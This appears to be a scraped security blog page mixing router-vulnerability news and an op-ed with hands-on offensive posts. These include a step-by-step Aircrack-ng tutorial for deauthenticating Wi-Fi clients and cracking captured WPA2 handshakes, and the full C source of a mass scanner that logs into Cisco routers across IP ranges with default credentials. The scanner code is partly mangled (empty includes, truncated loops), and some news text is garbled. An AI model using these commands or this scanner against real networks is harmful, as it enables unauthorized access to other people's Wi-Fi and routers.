Nexus: Network Security

A Critical Vulnerability in Inteno Routers

Read

Security researchers are warning users regarding new critical vulnerabilities in Inteno routers, which could allow remote attackers to replace the firmware on a device to take complete control over it and monitor the internet traffic.

According to F-Secure, the issue affects the Inteno EG500, FG101, DG201 routers. However, more models could be affected, but it couldn’t be sure due to the vendor’s unwillingness to cooperate.

F-Measure claimed the issue in January but, when the vendor replied two months later it argued that software issues are dealt with the operators that sell the equipment to the end users.

The vulnerability itself is associated with the fact that several router models don’t validate the Auto Configuration Server (ACS) certificates. This means that it will allow an attacker to launch Man in the Middle (MITM) attack between ACS and the device and gain full administrative access to the router, allowing them to refresh the firmware.

The implications of such a flaw are potentially serious, according to F-Secure cyber security expert, Janne Kauhanen. He warned:

“By changing the firmware, the attacker can change any and all rules of the router. Watching video content you’re storing on another computer? So is the attacker. Updating another device through the router? Hopefully it’s not vulnerable like this, or they’ll own that too”.

Although, HTTPS traffic is encrypted and won’t be beneficial if hacked by the attacker, but they can still redirect all your traffic to malicious sites that enable them to drop malware on your machine.

However, if HTTPS is not implemented and the attacker is able to launch Man in the Middle attack, then there is no way left to prevent a successful exploitation. Janne Kauhanen told Infosecurity:

“Gaining a MitM position is not trivial, but it’s not outside the realm of possibilities either, whether physically attacking a whole building by breaking into the distribution trunk in the building or using software tricks to route network traffic through a malicious site”.

F-Secure recommended users to keep browsers and other software updated to prevent hackers exploiting any flaws. The use of effective and well known antivirus software is suggested to prevent any malware downloads and to use a VPN to encrypt internet traffic and prevent hackers gaining that initial foothold into the network.

Read More Add comment

Australia’s Tier-3 launches Huntsman Security in the US to provide Security Systems

By 0x000216

Read

0 Comments

An Australian IT security company, Tier-3 has announced to enter the U.S. market Thursday with a plan to both disrupt and complement established security vendors in the threat management market.

Tier-3 is established on a global scale, including in Australia, the United Kingdom and Japan. The company is recognized for developing a patented behavior anomaly detection technology.

Huntsman Security that will be launched in the United States, offers a portfolio that includes a wide range of Security Information Event Management (SIEM) technology that provides real-time cognizance into preventing cyber attacks.

The Huntsman launch, a centralized enterprise security platform, will aggregate the output of SIEM environments from multiple vendors, including Splunk, Hewlett-Packard ArcSight, Q1 Labs and Huntsman Security's own technology, into a single dashboard for a consolidated view of enterprise threats.

Tier-3 used Behaviour Anomaly Detection as the DNA for Huntsman integrates existing security assets to provide a single view across the whole security environment.

Ultimately Huntsman adds a layer of intelligence above traditional enterprise security systems, to detect network behaviour that is unusual, suspicious or risky. This means that your security staff isn’t distracted by background noise when simplistic thresholds are crossed, and can focus on the events that pose a genuine threat.

This is how Tier-3’s Huntsman:
• makes connections between seemingly innocent isolated security events
• detects the complex, sophisticated or less obvious threats that other systems miss
• assesses their risk in context with normal network and system activities
• ensures that your IT staff can focus on genuine risks that threaten your operations

Huntsman is an innovative security platform for enterprises that need to adapt quickly and cost-effectively to unexpected new threats, new forms of data theft and new compliance requirements. It goes beyond traffic and network behavior analysis and focuses on "real" behaviour over the whole environment.

Tier-3 is globally accepted for providing expert, responsive service to local and global enterprises. It also provides security services for large corporations, and national infrastructure providers.

Read More Add comment

Over 12 Million Routers are Exposed to Critical hijacking Hack

By 0x000216

Read

0 Comments

More than 12 million routers in homes and small offices are vulnerable to attacks that allow hackers anywhere in the world to monitor user traffic and take administrative control over the devices, researchers said.

Source: thehackernews

The vulnerability resides in "RomPager" software, embedded into the residential gateway devices, made by a company known as AllegroSoft. Versions of RomPager prior to 4.34 contain a critical bug that allows attackers to send simple HTTP cookie files that corrupt device memory and hand over administrative control. Attackers can use that control to read plaintext traffic traveling over the device and possibly take other actions, including changing sensitive DNS settings and monitoring or controling Web cams, computers, or other connected devices. Researchers from Check Point's malware and vulnerability group have dubbed the bug Misfortune Cookie, because it allows hackers to determine the "fortune" of an HTTP request by manipulating cookies. They wrote:
"If your gateway device is vulnerable, then any device connected to your network—including computers, phones, tablets, printers, security cameras, refrigerators, toasters or any other networked device in your home or office network—may have increased risk of compromise. An attacker exploiting the Misfortune Cookie vulnerability can easily monitor your Internet connection, steal your credentials and personal or business data, attempt to infect your machines with malware, and over-crisp your toast."

Determining precisely what routers are vulnerable is a vexing undertaking. Devices frequently don't display identifying banners when unauthenticated users access them, and when such banners are presented, they often don't include information about the underlying software components. Beyond that, some device manufacturers manually patch the bug without upgrading the RomPager version, a practice that may generate false positives when automatically flagging all devices running versions prior to 4.34. To work around the challenges, Check Point researchers performed a comprehensive scan of Internet addresses that probed for vulnerable RomPager services. The results showed 12 million unique devices spanning 200 different models contained the bug. Manufacturers affected included Linksys, D-Link, Edimax, Huawei, TP-Link, ZTE, and ZyXEL.

Check Point has uncovered no evidence the vulnerability has been actively exploited, but researchers couldn't rule out such attacks, either. In-the-wild exploits might at least partially explain a rash of hacks earlier this year that remotely hijacked hundreds of thousands of routers on two separate occasions. What's more, Thursday's disclosure is likely to spur blackhats to begin exploiting the vulnerability.

The critical vulnerability was introduced in 2002, and a fix was made available three years later. As demonstrated by Check Point's finding that 12 million devices are susceptible to Misfortune Cookie attacks, the fix has yet to make its way into a significant number of routers. The bug has been assigned the identifier CVE-2014-9222.

Read Full Article on arstechnica

Read More Add comment

How to install metasploit framework from Github on Ubuntu

By 0x000216

Read

0 Comments

In this post, I'm going to share How to install metasploit framework from Github on Ubuntu 12.04.Some reference of installing metasploit,I got from here. I have added some steps which I think will make it more easier than the published post.

The installation process doesn't go well for me as my system have some compatibility issue as you will see in the video .I will do a separate post on it. Below are steps taken to do the installation

Steps summary

1) Update system

2) Install metasploit dependencies

3) (OPTIONAL) Install nmap

4) Download metasploit framework from Github

5) Install gems and version required by metasploit

6) Run metasploit framework

7) Create and connect the database with metasploit

8) Test and optimize metasploit search function

9) Add the metasploit folder to your system environment

Steps

1)Update and upgrade system

1.1)update system

shark_attack@Positive-Space:~$sudo apt-get update

update system

1.2)upgrade system

shark_attack@Positive-Space:~$sudo apt-get update

upgrade system

2)Install metasploit required dependencies

2.1)Install Ruby 1.9.3 and other dependencies

shark_attack@Positive-Space:~$sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre subversion git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev ruby1.9.3

Install Ruby dependencies

2.2) Install Ruby libraries that metasploit depend on

shark_attack@Positive-Space:~$sudo gem install wirble sqlite3 bundler

Install Ruby libraries that metasploit depend

3)(OPTIONAL) Install nmap

Install NMAP if you still don't use one on your system

shark_attack@Positive-Space:~$sudo apt-get install nmap

Install nmap

4)Download metasploit framework from Github to your system

shark_attack@Positive-Space:~$cd /opt

shark_attack@Positive-Space:~$git clone https://github.com/rapid7/metasploit-framework.git

Dowloading metasploit framework to /opt

5) Install gems and version required by metasploit.

After finish downloading, go to metasploit folder

shark_attack@Positive-Space:~$cd /opt/metasploit-framework

shark_attack@Positive-Space:/opt/metasploit-framework$sudo bundle install

go to metasploit folder

install bundle

NOTE: My system have problem installing the gems . It trigger "girl friday" error as shown in the video. Please check my next post on how I resolve it .I will not share details how to do it in this post .You can see it in this video though :-)

6)Run metasploit framework .

It might take few minutes for first time loading .

shark_attack@Positive-Space:~$./msfconsole

run metasploit

Metasploit

7)Create and connect the database with metasploit

7.1)Create user and postgres database . Make sure you remember what you type in when you create the user and database information.

shark_attack@Positive-Space:~$su -s

root@Positive-Space:~$su postgres

postgres@Positive-Space:/home/shark_attack$ createuser msf -P -S -R -D

postgres@Positive-Space:/home/shark_attack$ createdb -0 msf msf

creating user and db information

7.2)Connect database . msf4 folder will be in your home folder after you run metasploit for the first time.

Go to ./msf4 folder

shark_attack@Positive-Space:~$cd .msf4

shark_attack@Positive-Space:~/.msf4$

.msf4 folder

7.3)Create a file name "database.yml" and key in the detail informations that you have created before .Make sure all the details are correct including the password.

shark_attack@Positive-Space:~/.msf4$nano database.yml

key in your database and user detail as how you configured .





 adapter: postgresql

 database: msf

 password: shark_attack

username: msf

 pool: 75

host: 127.0.0.1
 port: 5432

 timeout: 5

type the db and user info

save it

database.yml in msf4 folder

8)Test and optimize metasploit search function

8.1)run metasploit framework from your console and check the database status once it finish load .Remember to run as sudo . It might take few minutes to load the first time

shark_attack@Positive-Space:/opt/metasploit-framework$ sudo ./msfconsole

msf>db_status

checking database status

8.2) This step is just something that I notice doesn't work on my system in which ,whenever I try to use the search on metasploit, it will give an error "Database not connected or cache not built,using slow search" . It took few minutes to search anything.To resolve this issue, I rebuild the db cache by typing below command .

msf>db_rebuild_cache

Database not connected or cache not built

rebuilding the cache

That's it for today. If you are looking on how to install Kali Linux in Ubuntu ,please visit here.

Read Previous:How to use Aircrack-ng 1.2 to crack WPA/WPA2

Read More Add comment

Indispensible Need of National CERT in Pakistan

By 0x000216

Read

0 Comments

In this advanced era where science and technology have become quite advanced, it leave not be incorrect to state that technology has become an essential component of our life whether it is about communication, medication, or something else. Information technology has earned a great deal of popularity in every developed country of modern age and it can be witnessed everywhere from traffic signs to power stations, from air ticketing to shopping deals, etc. Hence, it can be said that technology has become a basic ingredient of every facilitation available to the world in this high tech era.
In Pakistan, online sale purchase and other types of online jobs are gaining huge popularity with the passing of time. Now people prefer to do online transactions via using their credit cards and bank accounts online facility. Similarly, the recently announced 3G and 4G technology will also give a boost to the use of information technology.

Nevertheless, it is thus unfortunate that whatever has been discovered that is practised against the humankind in one or other form. The worst is now information technology is also being utilized as a weapon against humanity. Applying information technology as an abysmal weapon, the confidential information of the countries is being stolen, which can be applied.

A long list of evidences related to cyber-attacks is present when it comes to Pakistan. For example, various fiscal, educational, and diplomatic institutions of Pakistan Government and Pakistan Army were attacked by Indian Government Backed Hackers, back in 2010. Apart from this, various attacks were being prepared to steal secret information of the country. Almost 50-100 cyber-attacks are reported on Pakistani sites. The news concerned to these cyber-attacks made by international offices is not veiled from anyone, especially when it arrives to steal information via any virus or American NSA's cyber surveillance.

Modern countries of the current era are focusing extensively on cyber war and establishing cyber security research centers for the ultimate prevention of the cyber-attacks. Apart from this, the establishment of computer emergency response units is also in progress. Both of these cyber security research centers and computer emergency response units are of outstanding importance for their nation. The authorities cannot only keep an eye on their country’s Banking sector, but can also communicate with other countries to inform them about new cyber-attacks via these computer emergency response units. Moreover, these units will also become able to send the information related to cyber-attacks to different institutions of the country, especially to the commercial data center to bring these attacks to an end. This is the reason, which is why the secret information about the government and the banking sector of the countries having their computer emergency response units, is quite safe as compare to others, who do not own such units. Moreover, with these units, the effective and efficient cyber-attacks prevention strategies can also be implemented on time.

Everyone is concerned about the information technology and its security. However, its importance in Pakistan is still quite questionable where no one pays attention to the news related to hacking of seven banks in a week. The story does not end here. As per recent estimates, four government websites are receiving cyber-attacks on a daily basis, but no prevention technique is being adopted to stop these attacks. The authorities must understand that by hacking their official websites, the hackers can access to internal network system by infecting administration with their malware which can steal and forward all the significant files from C&C servers. In case of banking sector, they can get access to important credentials, including bank accounts, email passwords, and credit card details. Thus, being aware of the importance of cyber warfare is quite essential for our government and officials, especially in the current age of advance technology.

To avoid these cyber-attacks, the government of Pakistan must focus on the establishment of a computer emergency response unit of high excellence. It has been estimated that till 2020, Pakistan will go one of the secured high tech countries only if the government will establish computer emergency response unit till 2015. With this approach, Pakistan will not only become eligible to safeguard its industry, but will also become capable of protecting other nations from unauthorized access.

Hence, the essential requirement of this advanced era is to have computer emergency response units to eliminate the menace of cyber warfare and to enjoy cyber security. The expectations from PML-N government is quite high that the way they disseminate the network of optical fiber in the country, they introduced 3G and 4G in Pakistan, they will certainly work on the effective and efficient organization of quality computer emergency response units in the nation.

About The Author

This article has been written by "Mansab Chaudry", Chaudry is the founder of a Security company called Refluxes and the lead author at Whogothacked.com, A news blog covering Ethical hacking and Security news. In his free time he actively contributes to RHA with topics related to Cyber Security.

Read More Add comment

How to use Aircrack-ng 1.2 to crack WPA2 password

By 0x000216

Read

0 Comments

In this tutorial, I'm going to share , how to crack a WPA/WPA2 password using Aircrack 1.2 . This tutorial is a continuation from my previous post . I will not go into technical detail on the difference between the technology ,you can read it here. The reason of this tutorial is to widen our understanding on WPA/WPA2 concept and act as a proof of concept on how we can penetrate Wi-fi connection using Aircrack 1.2 program.

Before we go into detail how to do it , need to be noted here ,in order to do packet monitoring and injection, we need to use wireless card that support both of this function .In my case, I'm using TL-WN722N TP Link USB wireless card that come with atheros chipset. By default this card will work great with the default "ath9k" driver that come with Ubuntu 12.04 LTS package.

Proceed to below section to continue with the tutorial.

What you need

1.Working wireless card

2.Aircrack -ng suite installed on your system (check my previous post )

3. Word list dictionary to crack

Steps

1.Turn on the Wireless card to monitor mode (airmon-ng)

2. Discover the existing Wi-fi network (airodump-ng)

3. Sniff and capture packet for the desired Access Point (airodump-ng)

4.Inject packet to clear the ARP cache and wait forclient and AP authentication. (aireplay-ng)

5. Make sure you capture the "EAPOL"protocol

6.(OPTIONAL) Make a new folder and copy the word list dictionary into it .

7.Crack it!!

8.Test it!!!

Steps by steps

1.Turn on the Wireless card to monitor mode

1.1 start interface to monitor the network

shark_attack@Positive-Space:~$ sudo airmon-ng start wlan1

Enable wireless card monitor mode

1.2 (OPTIONAL) changing the MAC address. Normally, I change the MAC address because I can know which Access Point (AP) I'm connected to when I run "airodump-ng" . In the video I change the MAC to 00:11:22:33:44:55 .

shark_attack@Positive-Space:~$ sudo ifconfig mon0 down
shark_attack@Positive-Space:~$ sudo macchanger -m 00:11:22:33:44:55 mon0
shark_attack@Positive-Space:~$ sudo ifconfig mon0 up

Changing the MAC address

2. Discover the existing Wi-fi network (airmon-ng)

shark_attack@Positive-Space:~$ sudo airodump-ng mon0

Wi fi Network Discovering

You can use this command to monitor all the available network around your area. This information help you to determine the network that you want to crack .Please check below table on details of the information return by "airodump-ng" command . Thanks Aircrack-ng website for the below table.

BSSID	The MAC address of the AP
PWR	Signal strength. Some drivers don't report it
Beacons	Number of beacon frames received. If you don't have a signal strength you can estimate it by the number of beacons: the more beacons, the better the signal quality
Data	Number of data frames received
CH	Channel the AP is operating on
MB	Speed or AP Mode. 11 is pure 802.11b, 54 pure 802.11g. Values between are a mixture
ENC	Encryption: OPN: no encryption, WEP: WEP encryption, WPA: WPA or WPA2 encryption, WEP?: WEP or WPA (don't know yet)
ESSID	The network name. Sometimes hidden

Upper data show the available Access Point

BSSID	The MAC of the AP this client is associated to
STATION	The MAC of the client itself
PWR	Signal strength. Some drivers don't report it
Packets	Number of data frames received
Probes	Network names (ESSIDs) this client has probed

Lower data show the available client

If you change your MAC address and connected to the Access Point, you can detect easily which AP you are connected to . Look for active connection with active user .

3. Sniff and capture packet for the desired Access Point (airodump-ng)

Once you know which Access Point you want to crack, next step is run a command to sniff and capture the network.

shark_attack@Positive-Space:~$ sudo airodump-ng --bssid 9C:D3:6D:1A:1C:54 --channel 9 -w supermanbatman mon0

This command will monitor the AP with MAC address 9C:D3:6D:1A:1C:54 on channel 9 and will capture and write the sniffed information to supermanbatman file .

sniffed network information

4..Inject packet to clear the ARP cache and wait for client and AP authentication. (aireplay-ng)

Open a new terminal and run

shark_attack@Positive-Space:~$ sudo aireplay-ng -0 3 -a 9C:D3:6D:1A:1C:54 -c 08:37:3D:EC:9D:D3 --ignore-negative-one mon0

This command will inject 3 fake deauthentication packet to the client. In this example my client is the one that having 08:37:3D:EC:9D:D3 MAC address . "ignore-negative-one" is a miscellaneous command to ignore the mismatch if the interface's channel can't be determined.

Successfull packet injection

Once the packet is injected, the active client connection will be disconnected from the AP. Most of today computer will auto connect the AP because of the client system password saving function . After you done with the injection,let the packet capturing run for a while. This is important so that you capture the AP authentication information that it send to the client .How long you need to wait ?? The rule of thumb that I use, you need to monitor the active packet transmission between the client and the AP . An active connection mean that the client user is actively using the connection. This mean that he has successfully connected to the AP.

5. Make sure you capture the "EAPOL"protocol

Check the captured data with Wireshark for "EAP" protocol. "EAP" is stand for Extensible Authentication Protocol "EAP" only defines message formats. Protocol that uses EAP defines a way to encapsulate EAP messages within that protocol messages within that protocol messages. "EAPOL" stand for Extensible Autehntication Protocol Over LAN .Please read more here . Make sure you have this information to proceed to next step.

EAPOL messages

6. (OPTIONAL)Make a new folder and copy the word list dictionary into it .

In the video that I made, I compile everything in one folder for the sake of tutorial. If you know where is the location you stored the dictionary, you can straight away type in the terminal . For those who don't have any word dictionary, you can download it here .

7.Crack it!!

Once you have all the necessary requirement, here is the part where you will crack the file! .

the cracking result will depend on your Word list dictionary and your system processor speed. If you have a massive collection of word dictionary, you will increase the probability to get it crack . If you are lucky, you able to get the password crack within few minutes and can go up on to few hours/days or else your system will just return "No Key Found".

shark_attack@Positive-Space:~/supermanbatman$ sudo aircrack-ng -w darkc0de.lst supermanbatman-01.cap

Cracked password!

8.Test it!!!

The last and final step is test the new password with the AP!! :-)

That's it for now.Hope you guys enjoy this tutorial. Tell me how it goes with your cracking. If you want to view my captured file, please download it here .

:-)

Read Previous :How to install Aircrack 1.2-ng on ubuntu and other linux distro

Read More Add comment

[OMENS v1.17] The framework for distributing Actionable Intelligence

By 0x000216

Read

0 Comments

Read More Add comment

OCS Cisco Scanner 0.2

By 0x000216

Read

0 Comments

Compact mass scanner for Cisco routers with default telnet/enable passwords.
Changes: Various updates and bug fixes.

updated in jan2013
Download -
http://packetstormsecurity.com/files/download/119462/OCS-0.2.c

Just compile it with:

            gcc ocs.c -o ocs -lpthread

            Then run it with: ./OCS xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy
      xxx.xxx.xxx.xxx=range start IP
      yyy.yyy.yyy.yyy=range end IP

http://packetstormsecurity.com/files/119462/OCS-Cisco-Scanner-0.2.html

Source Code-

/*
   Author:  OverIP
         Andrea Piscopiello
         overip at gmail.com
   Source:  OCS v 0.2
   License: GPL
            This program is free software; you can redistribute it and/or
            modify it under the terms of the GNU General Public License
            as published by the Free Software Foundation; either version 2
            of the License, or (at your option) any later version.
   Email:   Write me for any problem or suggestion at: overip at gmail.com
   Date:    01/10/13
   Read me: Just compile it with:

            gcc ocs.c -o ocs -lpthread

            Then run it with: ./OCS xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy
        xxx.xxx.xxx.xxx=range start IP
        yyy.yyy.yyy.yyy=range end IP

      PAY ATTENTION: This source is coded for only personal use on
      your own router Cisco. Don't hack around.

      Special thanks to:
      Khlero with your patience this code is out there :*
      Shen139, without you I can't live :D
      people that helped betatesting this code :)
      Alex Kah and his Cisco Router :)
      I love U all :*
*/


#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 


int i=0;
int j=0;
int k=0;
int l=0;


char buffer_a[700];
char buffer_b[700];
char buffer_c[700];
char tmpIP[16];

pthread_t threadname;


void callScan()        // scanning
{
  scanna(tmpIP);
  pthread_exit(0);
}


static void funcAlarm()        //alarm
{
  pthread_exit(0);
}


int setnonblock(int sock)  //setta socket non bloccanti
{
  struct timeval timeout;

  timeout.tv_sec = 10;
  timeout.tv_usec = 0;
  if (setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO,(char*) &timeout, sizeof(timeout)))
  return 0;
  return 1;
}


void init(struct sockaddr_in *address,int port,int IP)
{
  address->sin_family=AF_INET;
  address->sin_port=htons((u_short)port);
  address->sin_addr.s_addr=IP;
}


int scanna(char*rangeIP)      //scanning
{
  int error;
  int sd;

  struct sockaddr_in server;

  close(sd);

  server.sin_family=AF_INET;
        server.sin_port=htons(23);
        server.sin_addr.s_addr=inet_addr(rangeIP);

  sd=socket(AF_INET,SOCK_STREAM,0);
  if(sd==-1)
  {
    printf("Socket Error(%s)\n",rangeIP);
    close(sd);
    pthread_exit(0);
  }

//  setnonblock(sd);
  signal(SIGALRM,funcAlarm);
  alarm(7);
  fflush(stdout);

   error=connect(sd,(struct sockaddr*)&server,sizeof(server));
   if(error==0)
  {
    printf("\n\n-%s\n",rangeIP);
    fflush(stdout);
    memset(buffer_c, '\0',700);
    recv(sd,buffer_c,700,0);
    printf("  |Logging... %s\n",rangeIP);
    fflush(stdout);
    memset(buffer_a, '\0',700);
    memset(buffer_b, '\0',700);

    send(sd,"cisco\r",6,0);

    sleep(1);

    recv(sd,buffer_a,700,0);

    if(strstr(buffer_a,"#"))
      printf("  |Default Enable Passwords found! Vulnerable Router IP: %s\n\n\n", rangeIP);
    else
    if(strstr(buffer_a,">"))
    {
      printf("  |Default Telnet password found. %s\n",rangeIP);
      fflush(stdout);
      send(sd,"enable\r",7,0);

      sleep(1);

      send(sd,"cisco\r",6,0);

      sleep(1);

      recv(sd,buffer_b,700,0);
      //printf("  Sto cercando di loggarmi in enable mode\n");
      //fflush(stdout);
    }
    if(strstr(buffer_b,"#"))
    printf("  |Default Telnet and Enable Passwords found! Vulnerable Router IP: %s\n\n\n", rangeIP);

    else

    printf("  |Router not vulnerable. \n");
    fflush(stdout);
  }
  else
  {
    printf("\n\n(%s) Filtered Ports\n",rangeIP);
    close(sd);
    alarm(0);
    signal(SIGALRM,NULL);
    pthread_exit(0);
  }

  close(sd);
  fflush(stdout);
  alarm(0);
  signal(SIGALRM,NULL);
  pthread_exit(0);
}


char *getByte(char *IP,int index);

int function1(char* IP, char* IP2)
{

  char rangeIP[16];

  pid_t pid;
  i=atoi(getByte(IP,1));
  j=atoi(getByte(IP,2));
  k=atoi(getByte(IP,3));
  l=atoi(getByte(IP,4));

  while(1)
  {

    sprintf(rangeIP,"%d.%d.%d.%d",i,j,k,l);
    strcpy(tmpIP,rangeIP);
     if(pthread_create(&threadname, NULL,callScan,NULL)!=0)
    {
      printf("+    Thread error:\n");
      perror(" -    pthread_create() ");
      exit(0);
    }
    fflush(stdout);
    pthread_join(threadname, NULL);
    fflush(stdout);
    l++;
    if (l==256)
      {
        l=0;
        k++;
        if (k==256)
        {
          k=0;
          j++;
          if (j==256)
          {
            j=0;
            i++;
          }
        }
      }

    if(i==atoi(getByte(IP2,1)) && j==atoi(getByte(IP2,2)) && k==atoi(getByte(IP2,3)) && l==atoi(getByte(IP2,4)))
    {
      break;
    }

  }

    sprintf(rangeIP,"%d.%d.%d.%d",i,j,k,l);
    strcpy(tmpIP,rangeIP);
    fflush(stdout);
     if(pthread_create(&threadname, NULL,callScan,NULL)!=0)
    {
      printf("+    Thread error:\n");
      perror(" -    pthread_create() ");
      exit(0);
    }
    pthread_join(threadname, NULL);

  fflush(stdout);
}


int main(int argc,char *argv[])
{

  int w;

   printf("********************************* OCS v 0.2 **********************************\n");
   printf("****                                                                      ****\n");
   printf("****                           coded by OverIP                            ****\n");
   printf("****                           overip at gmail.com                        ****\n");
   printf("****                           under GPL License                          ****\n");
   printf("****                                                                      ****\n");
   printf("****             usage: ./ocs xxx.xxx.xxx.xxx yyy.yyy.yyy.yyy             ****\n");
   printf("****                                                                      ****\n");
   printf("****                   xxx.xxx.xxx.xxx = range start IP                   ****\n");
   printf("****                    yyy.yyy.yyy.yyy = range end IP                    ****\n");
   printf("****                                                                      ****\n");
   printf("******************************************************************************\n");

  if(argc!=3)

  {
    printf("use: %s IP IP\n",argv[0]);
    exit(-1);
  }

  for(w=1;w<=5;w++)
  if(atoi(getByte(argv[1],w))>255 || atoi(getByte(argv[2],w))>255)
  {
    printf("use: ./OCS IP IP\n");
    exit (-1);
  }


  for(w=1;w<=5;w++)
  if(atoi(getByte(argv[1],w))  {
    function1(argv[1],argv[2]);
    return 0;
  }

  else if(atoi(getByte(argv[1],w))>atoi(getByte(argv[2],w)))
  {
    printf("use: %s IP IP\n",argv[0]);
    return 0;
  }


  printf("Same IPs \n");
  fflush(stdout);
  scanna(argv[1]);
  return 0;
}


char *getByte(char *IP,int index)
{

  int i=0;
  int separator=0;
  static char byte[3];

  for(i=0;i<4;i++)
  byte[i]='\0';
  memset(byte,0,sizeof(byte));

  for(i=0;i  {

    if((IP[i]=='.') && (separator==index-1))

    {
      return byte;
    }

    else
    if(IP[i]=='.')

    {
    separator++;
    }

    else
    if (separator==index-1)

    {
      strncat(byte,&IP[i],1);
    }

  }

  return byte;
}

Nexus

A Critical Vulnerability in Inteno Routers

Australia’s Tier-3 launches Huntsman Security in the US to provide Security Systems

Over 12 Million Routers are Exposed to Critical hijacking Hack

How to install metasploit framework from Github on Ubuntu

Indispensible Need of National CERT in Pakistan

How to use Aircrack-ng 1.2 to crack WPA2 password

[OMENS v1.17] The framework for distributing Actionable Intelligence

Download OMENS v1.17

OCS Cisco Scanner 0.2

mitmproxy - an SSL-capable man-in-the-middle proxy

ModSecurity 2.7.0-RC3 Candidate Released - Web application firewall

Recent Posts

Facebook